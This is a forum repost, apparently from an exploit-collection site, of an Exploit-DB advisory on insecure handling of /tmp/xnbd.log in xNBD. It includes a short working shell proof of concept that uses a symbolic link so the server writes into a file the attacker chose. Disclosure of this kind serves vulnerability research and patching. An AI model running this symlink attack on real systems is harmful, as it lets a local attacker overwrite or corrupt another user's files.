Exploit xNBD - '/tmp/xnbd.log' Insecure Temporary File Handling

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
38298
Проверка EDB
  1. Пройдено
Автор
SEBASTIAN PIPPING
Тип уязвимости
LOCAL
Платформа
LINUX
CVE
N/A
Дата публикации
2013-02-06
xNBD - '/tmp/xnbd.log' Insecure Temporary File Handling
Код:
source: https://www.securityfocus.com/bid/57784/info

xNBD is prone to a vulnerability because it handles temporary files in an insecure manner. 

Local attackers may leverage this issue to perform symbolic-link attacks in the context of the affected application. Other attacks may also be possible.

$ ln -s "${HOME}"/ATTACK_TARGET /tmp/xnbd.log

  $ touch DISK
  $ truncate --size=$((100*1024**2)) DISK

  $ /usr/sbin/xnbd-server --daemonize --target DISK
  xnbd-server(12462) msg: daemonize enabled
  xnbd-server(12462) msg: cmd target mode
  xnbd-server(12462) msg: disk DISK size 104857600 B (100 MB)
  xnbd-server(12462) msg: xnbd master initialization done
  xnbd-server(12462) msg: logfile /tmp/xnbd.log

  $ ls -l ~/ATTACK_TARGET
  -rw------- 1 user123 user123 653 Feb  1 16:41 \
    /home/user123/ATTACK_TARGET
 
Источник
www.exploit-db.com

Похожие темы